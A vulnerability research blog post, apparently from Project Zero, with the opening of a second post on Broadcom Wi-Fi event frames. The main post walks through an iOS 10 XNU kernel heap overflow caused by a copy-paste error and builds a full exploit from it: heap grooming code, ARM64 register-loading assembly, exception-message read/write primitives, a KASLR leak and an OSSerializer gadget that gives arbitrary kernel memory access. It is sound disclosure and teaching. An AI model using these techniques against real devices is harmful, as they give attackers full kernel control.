In iOS 10 a new entry appeared in the mach_traps table:
/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),
The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:
 struct mach_voucher_extract_attr_recipe_args {    PAD_ARG_(mach_port_name_t, voucher_name);    PAD_ARG_(mach_voucher_attr_key_t, key);    PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);    PAD_ARG_(user_addr_t, recipe_size);  };
A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.
Let’s walk through the trap code:
kern_return_tmach_voucher_extract_attr_recipe_trap(  struct mach_voucher_extract_attr_recipe_args *args){  ipc_voucher_t voucher = IV_NULL;  kern_return_t kr = KERN_SUCCESS;  mach_msg_type_number_t sz = 0;
 if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))    return KERN_MEMORY_ERROR;
copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.
mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.
 voucher = convert_port_name_to_voucher(args->voucher_name);  if (voucher == IV_NULL)    return MACH_SEND_INVALID_DEST;
convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.
 if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {    /* keep small recipes on the stack for speed */    uint8_t krecipe[sz];    if (copyin(args->recipe, (void *)krecipe, sz)) {      kr = KERN_MEMORY_ERROR;        goto done;    }    kr = mach_voucher_extract_attr_recipe(voucher,             args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);
   if (kr == KERN_SUCCESS && sz > 0)      kr = copyout(krecipe, (void *)args->recipe, sz);  }
If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:
 else {    uint8_t *krecipe = kalloc((vm_size_t)sz);    if (!krecipe) {      kr = KERN_RESOURCE_SHORTAGE;      goto done;    }
   if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {      kfree(krecipe, (vm_size_t)sz);      kr = KERN_MEMORY_ERROR;      goto done;    }
The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.
If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!
To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.
a recipe for copypastaRight above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.
These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.
It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.
This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)
Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {  kfree(krecipes, (vm_size_t)args->recipes_size);  kr = KERN_MEMORY_ERROR;  goto done; }
 if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {    kfree(krecipe, (vm_size_t)sz);    kr = KERN_MEMORY_ERROR;    goto done;  }
My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:
error: no member named 'recipes_size' in 'struct mach_voucher_extract_attr_recipe_args'; did you mean 'recipe_size'?if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {                                                  ^~~~~~~~~~~~                                                  recipe_size
Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.
Building primitivescopyin on iOS will fail if the size argument is greater than 0x4000000. Since recipes_size also needs to be a valid userspace pointer this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches unmapped source page and stop.

If the copyin fails the kalloced buffer will be immediately freed.
Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.
When I’m working on a new exploit I spend a lot of time looking for new primitives; for example objects  allocated on the heap which if I could overflow into it I could cause a chain of interesting things to happen. Generally interesting means if I corrupt it I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.
To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.
For anyone who has ever written a browser exploit this will be a familiar construct!
ipc_kmsgReading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:
struct ipc_kmsg {  mach_msg_size_t            ikm_size;  struct ipc_kmsg            *ikm_next;  struct ipc_kmsg            *ikm_prev;  mach_msg_header_t          *ikm_header;  ipc_port_t                 ikm_prealloc;  ipc_port_t                 ikm_voucher;  mach_msg_priority_t        ikm_qos;  mach_msg_priority_t        ikm_qos_override  struct ipc_importance_elem *ikm_importance;  queue_chain_t              ikm_inheritance;};
This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?
Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:
void ipc_kmsg_free(ipc_kmsg_t kmsg);
This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.
This macro is used to set the ikm_size field:
#define ikm_init(kmsg, size)  \MACRO_BEGIN                   \ (kmsg)->ikm_size = (size);   \
This macro uses the ikm_size field to set the ikm_header pointer:
#define ikm_set_header(kmsg, mtsize)                       \ MACRO_BEGIN                                                \ (kmsg)->ikm_header = (mach_msg_header_t *)                 \ ((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \MACRO_END
That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.
Finally there’s a check in ipc_kmsg_get_from_kernel:
 if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {    ip_unlock(dest_port);    return MACH_SEND_TOO_LARGE;  }
That’s using the ikm_size field to ensure that there’s enough space in the ikm_kmsg buffer for a message.
It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into... another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.
It’s about sending a messageikm_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ikm_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.
Larger messages bypass this cache are are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:
 kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));...    if (kmsg != IKM_NULL) {    ikm_init(kmsg, max_expanded_size);    ikm_set_header(kmsg, msg_and_trailer_size);  }
Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.
But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.
This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG apis for example. The function’s comment explains more:
* Routine: ipc_kmsg_get_from_kernel * Purpose: * First checks for a preallocated message * reserved for kernel clients.  If not found - * allocates a new kernel message buffer. * Copies a kernel message to the message buffer.
Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ikm_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and it’s not currently in-use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):
 if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {    mach_msg_size_t max_desc = 0;        kmsg = dest_port->ip_premsg;    if (ikm_prealloc_inuse(kmsg)) {      ip_unlock(dest_port);      return MACH_SEND_NO_BUFFER;    }
   if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {      ip_unlock(dest_port);      return MACH_SEND_TOO_LARGE;    }    ikm_prealloc_set_inuse(kmsg, dest_port);    ikm_set_header(kmsg, msg_and_trailer_size);    ip_unlock(dest_port);...    (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);
This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro to which sets ikm_header such that the message will align to the end the of the buffer and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is then when the kernel sends a message it will write the message contents off the end of the preallocate message buffer.
ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.
This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.
Exceptional behaviourThere’s one difficulty with preallocated messages: because they’re only used when the kernel send a message to us we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, this is much harder!
There are only and handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contains a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.
When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.
If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to to global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.
routine thread_set_exception_ports(         thread         : thread_act_t;         exception_mask : exception_mask_t;         new_port       : mach_port_t;         behavior       : exception_behavior_t;         new_flavor     : thread_state_flavor_t);
This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behaviour defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.
Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!
Some assembly required...In our iOS XCode project we can added a new assembly file and define a function load_regs_and_crash:
.text.globl  _load_regs_and_crash.align  2_load_regs_and_crash:mov x30, x0ldp x0, x1, [x30, 0]ldp x2, x3, [x30, 0x10]ldp x4, x5, [x30, 0x20]ldp x6, x7, [x30, 0x30]ldp x8, x9, [x30, 0x40]ldp x10, x11, [x30, 0x50]ldp x12, x13, [x30, 0x60]ldp x14, x15, [x30, 0x70]ldp x16, x17, [x30, 0x80]ldp x18, x19, [x30, 0x90]ldp x20, x21, [x30, 0xa0]ldp x22, x23, [x30, 0xb0]ldp x24, x25, [x30, 0xc0]ldp x26, x27, [x30, 0xd0]ldp x28, x29, [x30, 0xe0]brk 0.align  3
This function takes a pointer to a 240 byte buffer as the first argument then assigns each of the first 30 ARM64 general-purposes registers values from that buffer such that when it triggers a software interrupt via brk 0 and the kernel sends an exception message that message contains the bytes from the input buffer in the same order.
We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.
I’m going to build my own kernel debugger (with printfs and hexdumps)A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.
There’s a bootstrapping problem here; we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access!  In December I published the mach_portal iOS kernel exploit which gives you kernel memory read/write and as part of that I wrote a handful of kernel introspections functions which allowed you to find process task structures and lookup mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.
The first version of this new exploit was developed inside the mach_portal xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.
Inside mach_portal I was able to find the address of an preallocated port buffer like this:
 // allocate an ipc_kmsg:  kern_return_t err;  mach_port_qos_t qos = {0};  qos.prealloc = 1;  qos.len = size;    mach_port_name_t name = MACH_PORT_NULL;    err = mach_port_allocate_full(mach_task_self(),                                MACH_PORT_RIGHT_RECEIVE,                                MACH_PORT_NULL,                                &qos,                                &name);
 uint64_t port = get_port(name);  uint64_t prealloc_buf = rk64(port+0x88);  printf("0x%016llx,\n", prealloc_buf);
get_port was part of the mach_portal exploit and is defined like this:
uint64_t get_port(mach_port_name_t port_name){  return proc_port_name_to_port_ptr(our_proc, port_name);}
uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {  uint64_t ports = get_proc_ipc_table(proc);  uint32_t port_index = port_name >> 8;  uint64_t port = rk64(ports + (0x18*port_index)); //ie_object  return port;}
uint64_t get_proc_ipc_table(uint64_t proc) {  uint64_t task_t = rk64(proc + struct_proc_task_offset);  uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);  uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);  return is_table;}
These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.
I used this method with some trial and error to determine the correct value to overwrite ikm_size to be able to align the controlled portion of an exception message with the start of the next heap object.
get-where-whatThe final piece of the puzzle is the ability know where controlled data is; rather than write-what-where we want to get where what is.
One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.
One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks, the latest talk has details of the zone freelist randomization.
Whilst experimenting with the heap behaviour using the introspection techniques described above I noticed that some size classes would actually still give you close to linear allocation behavior (later allocations are contiguous.) It turns out this is due to the lower-level allocator which zalloc gets pages from; by exhausting a particular zone we can force zalloc to fetch new pages and if our allocation size is close to the page size we’ll just get that page back immediately.
This means we can use code like this:
 int prealloc_size = 0x900; // kalloc.4096    for (int i = 0; i < 2000; i++){    prealloc_port(prealloc_size);  }    // these will be contiguous now, convenient!  mach_port_t holder = prealloc_port(prealloc_size);  mach_port_t first_port = prealloc_port(prealloc_size);  mach_port_t second_port = prealloc_port(prealloc_size);  to get a heap layout like this:

This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique but works perfectly well enough for a research tool.
We can now free the holder port; trigger the overflow which will reuse the slot where holder was and overflow into first_port then grab the slot again with another holder port:
 // free the holder:  mach_port_destroy(mach_task_self(), holder);
 // reallocate the holder and overflow out of it  uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};  do_overflow(0x1000, 64, overflow_bytes);    // grab the holder again  holder = prealloc_port(prealloc_size);

The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first port to 0x1104.
After the ipc_kmsg structure has been filled in by ipc_get_kmsg_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:
void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,                      ipc_kmsg_t       kmsg){  ipc_kmsg_t first = queue->ikmq_base;  ipc_kmsg_t last;
 if (first == IKM_NULL) {    queue->ikmq_base = kmsg;    kmsg->ikm_next = kmsg;    kmsg->ikm_prev = kmsg;  } else {    last = first->ikm_prev;    kmsg->ikm_next = first;    kmsg->ikm_prev = last;    first->ikm_prev = kmsg;    last->ikm_next = kmsg;  }}
If the port has pending messages the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of messages sends and receives will allow us use this fact to read back the address of the second ipc_kmsg buffer:
 uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};  send_prealloc_msg(first_port, valid_header, 8);    // send a message to the second port  // writing a pointer to itself in the prealloc buffer  send_prealloc_msg(second_port, valid_header, 8);    // receive on the first port, reading the header of the second:  uint64_t* buf = receive_prealloc_msg(first_port);    // this is the address of second port  kernel_buffer_base = buf[1];

Here’s the implementation of send_prealloc_msg:
void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {  struct thread_args* args = malloc(sizeof(struct thread_args));  memset(args, 0, sizeof(struct thread_args));  memcpy(args->buf, buf, n*8);    args->exception_port = port;    // start a new thread passing it the buffer and the exception port  pthread_t t;  pthread_create(&t, NULL, do_thread, (void*)args);    // associate the pthread_t with the port  // so that we can join the correct pthread  // when we receive the exception message and it exits:  kern_return_t err = mach_port_set_context(mach_task_self(),                                            port,                                            (mach_port_context_t)t);
 // wait until the message has actually been sent:  while(!port_has_message(port)){;}}
Remember that to get the controlled data into port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args which contains a copy of the controlled data we want in the message and the target port then it starts a new thread which will call do_thread:
void* do_thread(void* arg) {  struct thread_args* args = (struct thread_args*)arg;  uint64_t buf[32];  memcpy(buf, args->buf, sizeof(buf));    kern_return_t err;  err = thread_set_exception_ports(mach_thread_self(),                                   EXC_MASK_ALL,                                   args->exception_port,                                   EXCEPTION_STATE,                                   ARM_THREAD_STATE64);  free(args);    load_regs_and_crash(buf);  return NULL;}
do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.
At this point the kernel’s interrupt handler will call exception_deliver which will look up the thread’s exception port and call the MIG mach_exception_raise_state method which will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field and use it to align the sent message to what it believes to be the end of the buffer:

In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?
Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.
We observed before that if a port’s message queue is empty when a message is enqueued the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting it’s header with one what makes the ipc_kmsg still be valid and unused) then reading back the message sent to first port we can determine the address of the second port’s ipc_kmsg buffer.
read/write to arbitrary read/writeWe’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.
For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.
Whoever developed that exploit had found that the IOKit Serializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.
In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.
Let’s free second_port and reallocate an IOKit userclient there:
 // send another message on first  // writing a valid, safe header back over second  send_prealloc_msg(first_port, valid_header, 8);    // free second and get it reallocated as a userclient:  mach_port_deallocate(mach_task_self(), second_port);  mach_port_destroy(mach_task_self(), second_port);    mach_port_t uc = alloc_userclient();    // read back the start of the userclient buffer:  buf = receive_prealloc_msg(first_port);
 // save a copy of the original object:  memcpy(legit_object, buf, sizeof(legit_object));    // this is the vtable for AGXCommandQueue  uint64_t vtable = buf[0];
alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.
Note that we sent another message with a valid header to first_port which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable, using this we can determine the KASLR slide thus work out the address of OSSerializer::serialize.
Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference which will call ::release().
Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:
class OSSerializer : public OSObject{  OSDeclareDefaultStructors(OSSerializer)
 void * target;  void * ref;  OSSerializerCallback callback;
 virtual bool serialize(OSSerialize * serializer) const;};
bool OSSerializer::serialize( OSSerialize * s ) const{  return( (*callback)(target, ref, s) );}
It’s clearer what’s going on if we look as the disassembly of OSSerializer::serialize:
; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)
MOV  X8, X1LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]MOV  X0, X9MOV  X2, X8BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]
Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory we can replace it with the following fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments:

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.
Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary but they both take three arguments: source, destination and size and we can only completely control two.
However since we already have the ability to read and write this fake object from userspace we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments so what we need is a wrapper around one of those which passes a fixed size.
Looking through the cross-references to those functions we find uuid_copy:
; uuid_copy(uuid_t dst, const uuid_t src)MOV  W2, #0x10 ; sizeB    _memmove
This function is just simple wrapper around memmove which always passes a fixed size of 16-bytes. Let’s integrate that final primitive into the serializer gadget:

To make the read into a write we just swap the order of the arguments to copy from an arbitrary address into our fake userclient object then receive the exception message to read the read data.
You can download my exploit for iOS 10.2 on iPod 6G here:
This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz, check out their code to see a different approach to exploiting this bug which also uses mach ports.
Critical code should be criticisedEvery developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.
Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.
XNU is not alone in this, it’s a common story across many codebases. For example LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation and for extra irony the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.
Categories: Security

Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 2)

Google Project Zero - Tue, 04/11/2017 - 13:03
Posted by Gal Beniamini, Project Zero
In this blog post we'll continue our journey into gaining remote kernel code execution, by means of Wi-Fi communication alone. Having previously developed a remote code execution exploit giving us control over Broadcom’s Wi-Fi SoC, we are now left with the task of exploiting this vantage point in order to further elevate our privileges into the kernel.

In this post, we’ll explore two distinct avenues for attacking the host operating system. In the first part, we’ll discover and exploit vulnerabilities in the communication protocols between the Wi-Fi firmware and the host, resulting in code execution within the kernel. Along the way, we’ll also observe a curious vulnerability which persisted until quite recently, using which attackers were able to directly attack the internal communication protocols without having to exploit the Wi-Fi SoC in the first place! In the second part, we’ll explore hardware design choices allowing the Wi-Fi SoC in its current configuration to fully control the host without requiring a vulnerability in the first place.
While the vulnerabilities discussed in the first part have been disclosed to Broadcom and are now fixed, the utilisation of hardware components remains as it is, and is currently not mitigated against. We hope that by publishing this research, mobile SoC manufacturers and driver vendors will be encouraged to create more secure designs, allowing a better degree of separation between the Wi-Fi SoC and the application processor.Part 1 - The “Hard” WayThe Communication Channel
As we’ve established in the previous blog post, the Wi-Fi firmware produced by Broadcom is a FullMAC implementation. As such, it’s responsible for handling much of the complexity required for the implementation of 802.11 standards (including the majority of the MLME layer).
Yet, while many of the operations are encapsulated within the Wi-Fi chip’s firmware, some degree of control over the Wi-Fi state machine is required within the host’s operating system. Certain events cannot be handled solely by the Wi-Fi SoC, and must therefore be communicated to the host’s operating system. For example, the host must be notified of the results of a Wi-Fi scan in order to be able to present this information to the user.
In order to facilitate these cases where the host and the Wi-Fi SoC wish to communicate with one another, a special communication channel is required.
However, recall that Broadcom produces a wide range of Wi-Fi SoCs, which may be connected to the host via many different interfaces (including USB, SDIO or even PCIe). This means that relying on the underlying communication interface might require re-implementing the shared communication protocol for each of the supported channels -- quite a tedious task.

Perhaps there’s an easier way? Well, one thing we can always be certain of is that regardless of the communication channel used, the chip must be able to transmit received frames back to the host. Indeed, perhaps for the very same reason, Broadcom chose to piggyback on top of this channel in order to create the communication channel between the SoC and the host.
When the firmware wishes to notify the host of an event, it does so by simply encoding a “special” frame and transmitting it to the host. These frames are marked by a “unique” EtherType value of 0x886C. They do not contain actual received data, but rather encapsulate information about firmware events which must be handled by the host’s driver.

Securing the Channel
Now, let’s switch over the the host’s side. On the host, the driver can logically be divided into several layers. The lower layers deal with the communication interface itself (such as SDIO, PCIe, etc.) and whatever transmission protocol may be tied to it. The higher layers then deal with the reception of frames, and their subsequent processing (if necessary).
First, the upper layers perform some initial processing on the received frames, such as removing encapsulated data which may have been added on-top of it (for example, transmission power indicators added by the PHY module). Then, an important distinction must be made - is this a regular frame that should be simply forwarded to the relevant network interface, or is it in fact an encoded event that the host must handle?
As we’ve just seen, this distinction is easily made! Just take a look at the ethertype and check whether it has the “special” value of 0x886C. If so, handle the encapsulated event and discard the frame.
Or is it?
In fact, there is no guarantee that this ethertype is unused in every single network and by every single device. Incidentally, it seems that the very same ethertype is used for the LARQ protocol used in HPNA chips (initially developed by Epigram, and subsequently purchased by Broadcom).
Regardless of this little oddity - this brings us to our first question: how can the Wi-Fi SoC and host driver distinguish between externally received frames with the 0x886C ethertype (which should be forwarded to the network interface), and internally generated event frames (which should not be received from external sources)?
This is a crucial question; the internal event channel, as we’ll see shortly, is extremely powerful and provides a huge, mostly unaudited, attack surface. If attackers are able to inject frames over-the-air that can subsequently be processed as event frames by the driver, they may very well be able to achieve code execution within the host’s operating system.
Well… Until several months prior to this research (mid 2016), the firmware made no effort to filter these frames. Any frame received as part of the data RX-path, regardless of its ethertype, was simply forwarded blindly to the host. As a result, attackers were able to remotely send frames containing the special 0x886C ethertype, which were then processed by the driver as if they were event frames created by the firmware itself!
So how was this issue addressed? After all, we’ve already established that just filtering the ethertype itself is not sufficient. Observing the differences between the pre- and post- patched versions of the firmware reveals the answer: Broadcom went for a combined patch, targeting both the Wi-Fi SoC’s firmware and the host’s driver.
The patch adds a validation method (is_wlc_event_frame) both to the firmware’s RX path, and to the driver. On the chip’s  side, the validation method is called immediately before transmitting a received frame to the host. If the validation method deems the frame to be an event frame, it is discarded. Otherwise, the frame is forwarded to the driver. Then, the driver calls the exact same verification method on received frames with the 0x886C ethertype, and processes them only if they pass the same validation method. Here is a short schematic detailing this flow:

As long as the validation methods in the driver and the firmware remain identical, externally received frames cannot be processed as events by the driver. So far so good.
